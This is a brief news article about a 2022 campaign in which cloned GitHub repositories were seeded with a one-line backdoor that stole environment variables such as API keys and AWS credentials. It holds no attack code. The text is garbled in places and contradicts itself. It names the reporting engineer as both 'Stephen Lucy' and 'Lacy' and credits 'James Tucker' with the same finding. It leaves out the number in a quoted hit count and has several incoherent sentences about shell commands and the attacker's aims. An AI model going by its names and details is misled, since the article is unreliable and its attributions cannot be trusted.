Strong Malware Attacks on Popular Developer Platform GitHub with 35,000 Code Hits

James Tucker, a GitHub engineer, noted that the clone repositories with the malicious URL had a one-line backdoor and had penetrated a user’s environment variable.

Popular development site GitHub was subjected to a significant, widespread malware campaign on Wednesday, August 3, with more than 35,000 “code hits” in a single day. It’s interesting that this just happened on the day when over 8000 Solana wallets were stolen.

Stephen Lucy, a GitHub engineer, reported on the massive hack. This problem was discovered by the developer when they were assessing a project. Lacy penned:

I’ve found evidence of what seems to be a big, widely disseminated malware assault against @github. Currently, github has over “code hits.” Currently discovered in the following projects: crypto, golang, python, js, bash, docker, and k8s. It is added to the install instructions, docker images, and npm scripts.

A wide range of projects, including crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes, have been abused in the most recent assault on Github. The malware assault has been directed especially against docker images, NPM scripts, and install documentation. It’s a more practical method to group frequently used shell commands for the projects.

The Kind of Malware Used in the Github Attack
The attacker initially builds a false repository in order to access any important data and avoid developers. The attacker then uploads to GitHub copies of legitimate projects. According to the investigation, the attacker sent “pull requests” for a number of these clone repositories.

James Tucker, another GitHub engineer, noted that a user’s environment variable had been compromised by the clone repositories with the malicious URL, and that they also included a one-line backdoor. Threat actors may get important information by infiltrating an area. These contain the API keys, tokens, cryptographic keys, and Amazon AWS credentials.

However, the one-liner backdoor lets remote attackers run arbitrary code on the PCs of everyone who runs the script on them. According to Bleeping computers, the outcomes varied depending on when the action took place.

Over the last month, the attackers have modified the vast majority of repositories with malicious code. A few hours ago, GitHub deleted part of the malicious code from its site. GitHub mentioned the following in a Wednesday update:

“GitHub is looking into the tweet from Wednesday, August 3, 2022, which said that: * No repositories were hacked. Instead of the original repositories, malicious code was uploaded to cloned ones. There was no obvious breach of the GitHub or maintainer accounts, and the clones were quarantined.

Leave a Reply